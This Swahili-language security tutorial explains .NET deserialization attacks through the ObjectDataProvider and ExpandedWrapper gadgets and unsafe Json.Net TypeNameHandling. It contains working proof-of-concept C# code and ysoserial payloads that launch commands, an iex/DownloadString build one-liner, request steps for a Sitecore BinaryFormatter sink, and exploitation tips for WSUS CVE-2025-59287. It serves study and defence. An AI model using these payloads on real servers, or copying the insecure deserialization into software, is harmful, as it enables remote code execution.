Deserialization ya msingi ya .Net (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)

Reading time: 10 minutes

Chapisho hili limelenga kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya na gadget hiyo.

Gadget ya ObjectDataProvider

From the documentation: the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source.
Naam, ni maelezo ya ajabu, hivyo tuchunguze nini hasa darasa hili kina ambacho ni cha kuvutia: Darasa hili huruhusu ku-wrap object yoyote, kutumia MethodParameters ili kusanidi parameta yoyote, na kisha kutumia MethodName kuita function yoyote ya object iliyotajwa kwa kutumia parameta hizo.
Kwa hivyo, object hiyo itakuwa inakamilisha function na parameta wakati inapotolewa (deserialized).

Hii inawezekanaje

Namespace ya System.Windows.Data, iliyopo ndani ya PresentationFramework.dll katika C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, ndio mahali ObjectDataProvider imefafanuliwa na kutekelezwa.

Kwa kutumia dnSpy unaweza kuchunguza msimbo wa darasa tunalolihusu. Katika picha hapa chini tunaona msimbo wa PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name

Kama unavyoona, wakati MethodName imesanidiwa base.Refresh() inaitwa, tuchukulie kidogo tu kuona inafanya nini:

Sawa, tuendelee kuona nini this.BeginQuery() inafanya. BeginQuery imepitishwa (overridden) na ObjectDataProvider na hivi ndivyo inavyofanya:

Kumbuka kwamba mwishoni mwa msimbo inaitisha this.QueryWorke(null). Tazama nini hiyo inatekeleza:

Kumbuka hii si sehemu kamili ya msimbo wa function QueryWorker lakini inaonyesha sehemu ya kuvutia: Msimbo unaita this.InvokeMethodOnInstance(out ex); hii ndio mstari ambapo seti ya method zinafanywa invoke.

Ikiwa ungependa kuthibitisha kwamba kwa kuweka tu MethodName** itafanywa execute**, unaweza kuendesha msimbo huu:

using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}

Kumbuka kwamba unahitaji kuongeza kama reference C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll ili kupakia System.Windows.Data

ExpandedWrapper

Kutumia exploit iliyopita kutakuwa na matukio ambapo object itakuwa deserialized as an ObjectDataProvider instance (kwa mfano katika DotNetNuke vuln, ukitumia XmlSerializer, object ilideserializa kwa kutumia GetType). Hivyo, haitakuwa na wazi kuhusu aina ya object inayofungwa ndani ya ObjectDataProvider instance (Process kwa mfano). Unaweza kupata maelezo zaidi kuhusu DotNetNuke vuln hapa.

Darasa hili linawezesha specify the object types of the objects that are encapsulated in a given instance. Hivyo, darasa hili linaweza kutumika kufunika source object (ObjectDataProvider) ndani ya aina mpya ya object na kutoa properties tunazohitaji (ObjectDataProvider.MethodName na ObjectDataProvider.MethodParameters).
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutaweza wrap _ObjectDataProvider** inside an **ExpandedWrapper _ instance and when deserialized this class will create the OjectDataProvider object that will execute the function indicated in MethodName.

Unaweza kuangalia wrapper hii kwa kutumia code ifuatayo:

using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}

Json.Net

Kwenye official web page imeelezwa kwamba maktaba hii inaruhusu Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer. Kwa hiyo, ikiwa tunaweza deserialize the ObjectDataProvider gadget, tunaweza kusababisha RCE kwa tu deserializing an object.

Mfano wa Json.Net

Kwanza kabisa, tuchunguze mfano wa jinsi ya serialize/deserialize object kwa kutumia maktaba hii:

using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}

Kutumia vibaya Json.Net

Kutumia ysoserial.net niliunda exploit:

yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Katika msimbo huu unaweza test the exploit, endesha tu na utaona kwamba calc itaendeshwa:

using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}

Advanced .NET Gadget Chains (YSoNet & ysoserial.net)

The ObjectDataProvider + ExpandedWrapper technique introduced above is only one of MANY gadget chains that can be abused when an application performs unsafe .NET deserialization. Modern red-team tooling such as YSoNet (and the older ysoserial.net) automate the creation of ready-to-use malicious object graphs for dozens of gadgets and serialization formats.

Chini ni rejea iliyofupishwa ya mnyororo muhimu zaidi uliopakiwa na YSoNet pamoja na maelezo mafupi ya jinsi inavyofanya kazi na mifano ya amri za kuzalisha payloads.

Building / Installing YSoNet

If no pre-compiled binaries are available under Actions ➜ Artifacts / Releases, the following PowerShell one-liner will set up a build environment, clone the repository and compile everything in Release mode:

Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes;

git clone https://github.com/irsdl/ysonet
cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release

The compiled ysonet.exe can then be found under ysonet/bin/Release/.

Sink ya ulimwengu halisi: Sitecore convertToRuntimeHtml → BinaryFormatter

Sink ya vitendo ya .NET inayoweza kufikiwa katika mitiririko ya Sitecore XP Content Editor yaliyothibitishwa:

• Sink API: Sitecore.Convert.Base64ToObject(string) inatumia new BinaryFormatter().Deserialize(...).
• Njia ya kuamsha: pipeline convertToRuntimeHtml → ConvertWebControls, ambayo inatafuta kipengele jirani chenye id="{iframeId}_inner" na kusoma sifa ya value inayotendewa kama data iliyobanwa kwa base64 na iliyoserialishwa. Matokeo yanageuzwa kuwa string na kuingizwa katika HTML.

// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded

__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc"></iframe>
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
</html>

// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...

• Gadget: msururu wowote wa BinaryFormatter unaorejesha string (side‑effects run during deserialization). Tazama YSoNet/ysoserial.net ili kuzalisha payloads.

For a full chain that starts pre‑auth with HTML cache poisoning in Sitecore and leads to this sink:

Sitecore

Somo la kesi: WSUS unsafe .NET deserialization (CVE-2025-59287)

• Product/role: Windows Server Update Services (WSUS) role on Windows Server 2012 → 2025.
• Attack surface: IIS-hosted WSUS endpoints over HTTP/HTTPS on TCP 8530/8531 (often exposed internally; Internet exposure is high risk).
• Root cause: Unauthenticated deserialization ya data inayodhibitiwa na mshambuliaji ikitumia legacy formatters:
• GetCookie() endpoint inafanya deserialization ya AuthorizationCookie kwa kutumia BinaryFormatter.
• ReportingWebService inafanya unsafe deserialization kupitia SoapFormatter.
• Impact: Kitu kilicho serialized kwa uundaji husababisha gadget chain wakati wa deserialization, na kusababisha utekelezaji wa msimbo wa hiari kama NT AUTHORITY\SYSTEM chini ya huduma ya WSUS (wsusservice.exe) au IIS app pool wsuspool (w3wp.exe).

Vidokezo vya matumizi ya vitendo

• Discovery: Skanni kwa WSUS kwenye TCP 8530/8531. Chukulia blob yoyote serialized pre‑auth inayofikia web methods za WSUS kama sink inayowezekana kwa payloads za BinaryFormatter/SoapFormatter.
• Payloads: Tumia YSoNet/ysoserial.net kuzalisha BinaryFormatter au SoapFormatter chains (mfano, TypeConfuseDelegate, ActivitySurrogateSelector, ObjectDataProvider).
• Expected process lineage on success:
• wsusservice.exe -> cmd.exe -> cmd.exe -> powershell.exe
• w3wp.exe (wsuspool) -> cmd.exe -> cmd.exe -> powershell.exe

Marejeo

• YSoNet – .NET Deserialization Payload Generator
• ysoserial.net – original PoC tool
• Microsoft – CVE-2017-8565
• watchTowr Labs – Sitecore XP cache poisoning → RCE
• Unit 42 – Microsoft WSUS RCE (CVE-2025-59287) actively exploited
• MSRC – CVE-2025-59287 advisory
• NVD – CVE-2025-59287